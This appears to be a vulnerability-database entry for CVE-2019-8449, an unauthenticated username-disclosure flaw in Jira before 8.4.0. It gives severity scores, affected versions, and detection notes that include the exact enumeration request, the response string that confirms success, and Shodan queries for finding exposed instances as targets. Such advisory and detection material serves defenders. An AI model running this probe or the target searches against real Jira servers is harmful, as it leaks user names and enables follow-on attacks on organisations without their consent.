cbcvebase.
CVE-2019-8449
published 2019-09-11

CVE-2019-8449: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure…

PriorityP359medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
EXPLOIT
EPSS
84.77%
99.7th percentile
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.

Affected

2 ranges
VendorProductVersion rangeFixed in
atlassianjira< 8.4.08.4.0
atlassianjira>= unspecified < 8.4.08.4.0

Detection & IOCsextracted from sources · hover to see the quote

url/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
path/rest/api/latest/groupuserpicker
  • Send a GET request to /rest/api/latest/groupuserpicker with parameters (e.g., query, maxResults, showAvatar). A vulnerable Jira instance (<8.4.0) will respond with HTTP 200 and a JSON body beginning with {"users":{"users": — confirming unauthenticated username enumeration.
  • Match both HTTP 200 status code AND the response body containing the string {"users":{"users": to confirm exploitation of CVE-2019-8449.
  • Shodan queries can be used to identify exposed Jira instances as targets: search for http.component:"Atlassian Jira" or cpe:"cpe:2.3:a:atlassian:jira".
  • The exploit requires no authentication (PR:N, UI:N per CVSS). Any unauthenticated GET to the groupuserpicker endpoint with a query parameter is sufficient to trigger disclosure.
  • ·Vulnerability affects Jira versions 2.1 through 8.3.4 (fixed in 8.4.0). Confirm target version before testing; patched instances will not return the vulnerable JSON response.
  • ·If the endpoint does not return a JSON response, the instance may be patched or the domain/path is incorrect. The exploit script explicitly warns that a non-JSON response likely means the instance is not exploitable.

CVSS provenance

nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
osv7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.